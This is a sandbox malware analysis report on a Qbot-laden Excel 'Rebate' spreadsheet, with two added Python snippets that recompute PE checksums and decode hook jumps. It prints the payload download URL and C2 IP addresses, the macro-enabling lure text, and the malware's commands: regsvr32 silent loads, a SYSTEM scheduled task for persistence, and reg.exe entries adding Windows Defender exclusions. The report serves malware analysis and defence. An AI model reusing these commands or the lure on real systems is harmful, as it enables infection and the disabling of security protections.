Windows Analysis Report Rebate-690835286-10052021.xls

Overview

General Information

Sample Name: Rebate-690835286-10052021.xls
Analysis ID: 497532
MD5: 1513c88677fc7fa1994a59197ebdb528
SHA1: b4b9486e65b90c10c2e0bd1c3617771ccec0a335
SHA256: 7eaf061ea660be58767918cb80fb98da9c348be2b2449836bf840cfbf12882ec
Detection

Hidden Macro 4.0 Qbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Qbot
Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus detection for URL or domain
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
PE file overlay found
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Found malware configuration
Source: 9.2.explorer.exe.e0000.0.unpack Malware Configuration Extractor: Qbot {"Bot id": "obama109", "Campaign": "1633422349", "Version": "402.363", "C2 list": [...]}
Antivirus detection for URL or domain
Source: http://101.99.90.118/44474.9279916667.dat Avira URL Cloud: Label: phishing
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: c:\level\match\lift_Fit\set\Nation\Heat.pdb source: regsvr32.exe, 00000008.00000002.646420576.000000006CB42000.00000002.00020000.sdmp, explorer.exe, 00000009.00000003.646985681.0000000002760000.00000004.00000001.sdmp, regsvr32.exe, 0000000D.00000002.723731467.000000006CB42000.00000002.00020000.sdmp
Source: Binary string: amstream.pdb source: explorer.exe, 00000009.00000003.646641483.0000000002760000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000003.723947721.00000000015F0000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0AEF6 FindFirstFileW,FindNextFileW, 8_2_6CB0AEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000EAEF6 FindFirstFileW,FindNextFileW, 9_2_000EAEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0008AEF6 FindFirstFileW,FindNextFileW, 14_2_0008AEF6

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 44474.9279916667[1].dat.0.dr
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 194.36.191.21:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 101.99.90.118:80

Networking:

Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 05 Oct 2021 20:18:03 GMTContent-Type: application/octet-streamContent-Length: 1079808Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44474.9279916667.dat"
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /44474.9279916667.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 101.99.90.118Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 194.36.191.21
Source: unknown TCP traffic detected without corresponding DNS query: 185.123.53.199
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.90.118
Source: regsvr32.exe, 00000008.00000002.645961508.0000000002620000.00000002.00020000.sdmp, explorer.exe, 00000009.00000002.906949180.0000000001F10000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.723204215.0000000000DA0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.906929427.0000000000F70000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000005.00000002.594742750.0000000001CB0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.595494652.0000000001D40000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.646970896.0000000001D50000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.645612767.0000000002320000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.724170254.00000000008F0000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.722812935.0000000000890000.00000002.00020000.sdmp, reg.exe, 0000000F.00000002.726341911.0000000000830000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000008.00000002.645961508.0000000002620000.00000002.00020000.sdmp, explorer.exe, 00000009.00000002.906949180.0000000001F10000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.723204215.0000000000DA0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.906929427.0000000000F70000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44474.9279916667[1].dat

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" in the yellow bar 19 above. 20 21 example of notification 22 23 ( 0 Thlsfi|eor
Source: Screenshot number: 4 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
Source: Document image extraction number: 0 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
Source: Document image extraction number: 0 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 0 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Document image extraction number: 1 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 1 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44474.9279916667[1].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Celod.wac2
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB15000 8_2_6CB15000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB16EF0 8_2_6CB16EF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB11790 8_2_6CB11790
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB1237E 8_2_6CB1237E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000F5000 9_2_000F5000
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000F6EF0 9_2_000F6EF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000F237E 9_2_000F237E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000F1790 9_2_000F1790
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_00095000 14_2_00095000
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_00096EF0 14_2_00096EF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0009237E 14_2_0009237E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_00091790 14_2_00091790
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Rebate-690835286-10052021.xls OLE, VBA macro line: Sub auto_close()
Source: Rebate-690835286-10052021.xls OLE, VBA macro line: Sub auto_open()
Source: Rebate-690835286-10052021.xls OLE, VBA macro line: Private Sub saWorkbook_Opensa()
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0CBB9 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 8_2_6CB0CBB9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0C702 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 8_2_6CB0C702
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\regsvr32.exe Process Stats: CPU usage > 98%
PE file does not import any functions
Source: Celod.wac2.9.dr Static PE information: No import functions for PE file found
Source: Celod.wac2.14.dr Static PE information: No import functions for PE file found
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Jjyjdgvcvuvi' /d '0'
Document contains embedded VBA macros
Source: Rebate-690835286-10052021.xls OLE indicator, VBA macros: true
PE file overlay found
Source: Celod.wac2.14.dr Static PE information: Data appended to the last section found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write
Source: 44474.9279916667[1].dat.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Celod.wac2.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Celod.wac2.9.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ....................<.............3.....(.P.............................O.......................................................................
Source: C:\Windows\System32\reg.exe Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........h.%.....N.......(...............
Source: C:\Windows\System32\reg.exe Console Write: ................4...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........x.......N.......(...............
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac2
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac2
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn tcrzbkfctd /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac2\'' /SC ONCE /Z /ST 22:20 /ET 22:32
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Celod.wac2'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac2'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Jjyjdgvcvuvi' /d '0'
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uwwyocree' /d '0'
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Celod.wac2'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac2'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Application Data\Microsoft\Forms
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD538.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@25/6@0/3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0D565 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket, 8_2_6CB0D565
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: Rebate-690835286-10052021.xls OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0ABE5 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle, 8_2_6CB0ABE5
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{CA527C6B-71D3-4220-8B46-2F1242F5F8B8}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\Global\{777F4761-072A-4531-A5CA-24A6C4481E01}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{1FDB5674-1064-402F-9161-01DD82884DA4}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{CA527C6B-71D3-4220-8B46-2F1242F5F8B8}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{777F4761-072A-4531-A5CA-24A6C4481E01}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{1FDB5674-1064-402F-9161-01DD82884DA4}
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0A55C FindResourceA, 8_2_6CB0A55C
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Window found: window name: SysTabControl32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB22897 push FFFFFFC9h; retf 8_2_6CB22899
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB258D9 push esp; iretd 8_2_6CB258DA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB290CF push dword ptr [edi+5B8515F0h]; ret 8_2_6CB291B4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB2841A push esp; ret 8_2_6CB2841B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB23001 push ebx; iretd 8_2_6CB23014
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB26C06 push edi; ret 8_2_6CB26C07
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB2285F pushad ; ret 8_2_6CB2284B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB27DA1 push ebp; ret 8_2_6CB27DC8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB27DAE push ebp; ret 8_2_6CB27DC8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB2393C push ebx; ret 8_2_6CB23974
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB2912F push dword ptr [edi+5B8515F0h]; ret 8_2_6CB291B4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB21698 push edi; ret 8_2_6CB216A4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB22E99 push ebx; iretd 8_2_6CB23014
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB23EFE push 488B8349h; iretd 8_2_6CB23F20
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB232C0 push eax; ret 8_2_6CB232C4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB24237 push esp; retf 8_2_6CB24285
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB27227 push ds; iretd 8_2_6CB27230
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB2320C push es; ret 8_2_6CB2322F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB223BE push ebp; ret 8_2_6CB2242F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB2838C pushfd ; iretd 8_2_6CB2838D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB22762 pushad ; ret 8_2_6CB2284B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB21765 push eax; retf 8_2_6CB21766
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB2175A push ebp; ret 8_2_6CB21762
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CC09C21 push dword ptr [esi]; iretd 8_2_6CC09C26
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CC0A23E push eax; iretd 8_2_6CC0A23F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000FA00E push ebx; ret 9_2_000FA00F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000FD485 push FFFFFF8Ah; iretd 9_2_000FD50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000FD4B6 push FFFFFF8Ah; iretd 9_2_000FD50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000F9D5C push cs; iretd 9_2_000F9E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000F9E5E push cs; iretd 9_2_000F9E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000FBB21 push esi; iretd 9_2_000FBB26
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0DFEF LoadLibraryA,GetProcAddress, 8_2_6CB0DFEF
PE file contains an invalid checksum
Source: Celod.wac2.9.dr Static PE information: real checksum: 0x10c364 should be: 0x10e35b
Source: Celod.wac2.14.dr Static PE information: real checksum: 0x10c364 should be: 0x5c82
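The two "real checksum ... should be" lines compare the IMAGE_OPTIONAL_HEADER.CheckSum field stored in each dropped file with the value recomputed from the file's bytes. The Python below is an added example, not part of the sandbox report: it implements that recomputation (the 16-bit one's-complement sum used by CheckSumMappedFile, skipping the CheckSum field itself and then adding the file length) and exercises it on a small headers-only PE constructed here for the purpose; the dropped Celod.wac2 files themselves are not reproduced.

```python
"""Recompute a PE header checksum and compare it with the stored field.

Added example, not part of the original report. The minimal PE built by
build_minimal_pe() is constructed for this example and is not a real binary.
"""
import struct


def checksum_field_offset(data):
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum (0x40 into the optional header)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    optional_header = e_lfanew + 4 + 20          # PE signature + IMAGE_FILE_HEADER
    return optional_header + 0x40


def compute_pe_checksum(data):
    """Return the value the CheckSum field *should* hold for these bytes."""
    skip = checksum_field_offset(data)
    if skip % 4:
        raise ValueError("CheckSum field is not DWORD aligned")
    padded = data + b"\0" * (-len(data) % 4)     # pad to a DWORD boundary
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue                             # the field itself counts as zero
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)   # end-around carry
    total = (total & 0xFFFF) + (total >> 16)     # fold to 16 bits
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)                     # the original (unpadded) length


def stored_pe_checksum(data):
    return struct.unpack_from("<I", data, checksum_field_offset(data))[0]


def check_pe_checksum(data):
    """(stored, computed, matches): the triad behind 'real checksum ... should be'."""
    stored, computed = stored_pe_checksum(data), compute_pe_checksum(data)
    return stored, computed, stored == computed


def fix_pe_checksum(data):
    """Return a copy of `data` with the CheckSum field set to the computed value."""
    off = checksum_field_offset(data)
    return data[:off] + struct.pack("<I", compute_pe_checksum(data)) + data[off + 4:]


def build_minimal_pe(body=b"", checksum=0):
    """Constructed headers-only PE32 image (e_lfanew=0x40, 0xE0-byte optional header)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine=i386, 0 sections, timestamp, symtab ptr, nsyms, SizeOfOptionalHeader, flags
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0xE0, 0x2102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 0x40, checksum)  # CheckSum
    return dos + b"PE\0\0" + file_hdr + bytes(opt) + body


if __name__ == "__main__":
    sample = build_minimal_pe(b"\x90" * 37)
    stored, computed, ok = check_pe_checksum(sample)
    print(f"real checksum: {stored:#x} should be: {computed:#x} match={ok}")
```

Both Celod.wac2 drops carry the same stored value, 0x10c364, yet recompute to 0x10e35b and 0x5c82. Because the sum ends by adding the file length, the second figure bounds that file at under 24 KB while the first implies roughly 1 MB, so the two writes to C:\Users\user\Celod.wac2 (one by EXCEL.EXE, one by explorer.exe) were different files rather than two copies of one. A mismatch on its own is weak evidence: Windows only enforces the checksum for drivers and a few system DLLs, and plenty of legitimate third-party binaries ship with it zeroed or stale. A stored value that is non-zero and wrong, as here, does usually mean the bytes were altered after linking.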

Persistence and Installation Behavior:

Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Celod.wac2
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac2
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac2
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44474.9279916667[1].dat
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac2
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac2

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Celod.wac2
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn tcrzbkfctd /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac2\'' /SC ONCE /Z /ST 22:20 /ET 22:32

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2556 base: 44102D value: E9 9B 4C CA FF
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2300 base: 44102D value: E9 9B 4C C4 FF
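Each of the two writes above is a 5-byte E9 rel32 (jmp) patch placed at the same address, 0x44102D, in one of the two explorer.exe instances. Decoding the displacement shows where the hook sends execution. The Python below is an added example, not part of the sandbox report: the patched address, the written bytes and the two region bases (0xE0000 and 0x80000, the explorer.exe memory that the Yara matches later in this report identify as unpacked Qbot) come from the report, while the region size used for the containment check is an assumption, and because the report does not state which PID is which process index, the lookup is by address only.

```python
"""Decode the 'Memory written ... value: E9 ...' hooks recorded by the sandbox.

Added example, not part of the original report. HOOK_WRITES and the region
bases are copied from the report; the 0x10000 region size is an assumption.
"""
import struct

# (pid, address written, bytes written), exactly as the report lists them
HOOK_WRITES = [
    (2556, 0x44102D, bytes.fromhex("E99B4CCAFF")),
    (2300, 0x44102D, bytes.fromhex("E99B4CC4FF")),
]

# Yara-matched Qbot regions in the two explorer.exe instances (base, size)
KNOWN_REGIONS = {
    "9.2.explorer.exe.e0000": (0xE0000, 0x10000),
    "14.2.explorer.exe.80000": (0x80000, 0x10000),
}


def decode_jmp_rel32(address, patch):
    """Absolute target of an E9 rel32 jump written at `address`.

    rel32 is relative to the end of the 5-byte instruction:
    target = address + 5 + sign_extend(rel32), truncated to 32 bits (WOW64).
    """
    if len(patch) != 5 or patch[0] != 0xE9:
        raise ValueError("not a 5-byte E9 jmp rel32 patch")
    (rel32,) = struct.unpack("<i", patch[1:5])      # little-endian, signed
    return (address + 5 + rel32) & 0xFFFFFFFF


def locate_target(target, regions=KNOWN_REGIONS):
    """Name of the known region containing `target`, or None."""
    for name, (base, size) in regions.items():
        if base <= target < base + size:
            return name
    return None


def resolve_hooks(writes=HOOK_WRITES, regions=KNOWN_REGIONS):
    """(pid, target, region name or None, offset into region or None) per write."""
    out = []
    for pid, addr, patch in writes:
        target = decode_jmp_rel32(addr, patch)
        region = locate_target(target, regions)
        offset = target - regions[region][0] if region else None
        out.append((pid, target, region, offset))
    return out


if __name__ == "__main__":
    for pid, target, region, offset in resolve_hooks():
        where = f"{region} +0x{offset:X}" if region else "outside known regions"
        print(f"PID {pid}: jmp 0x44102D -> 0x{target:08X} ({where})")
```

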